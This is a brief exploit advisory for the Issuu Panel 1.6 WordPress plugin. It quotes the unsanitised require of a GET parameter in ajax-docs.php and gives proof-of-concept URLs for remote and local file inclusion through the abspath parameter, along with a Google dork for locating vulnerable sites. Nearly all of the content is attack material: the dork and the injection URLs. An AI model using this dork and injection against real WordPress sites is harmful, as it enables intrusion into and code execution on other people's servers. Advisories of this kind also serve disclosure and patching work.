# Exploit Title: Wordpress Plugin Issuu Panel - RFI & LFI # Exploit Author: CrashBandicot # Date: 2016-03-23 # Google Dork : inurl:/wp-content/plugins/issuu-panel/ # Vendor Homepage: https://wordpress.org/plugins/issuu-panel/ # Tested on: MsWIn # Version: 1.6 # Vulnerable File : menu/documento/requests/ajax-docs.php 3. require($_GET['abspath'] . '/wp-load.php'); # PoC : http://127.0.0.1/wordpress/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=[RFI] http://127.0.0.1/wordpress/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=[LFI]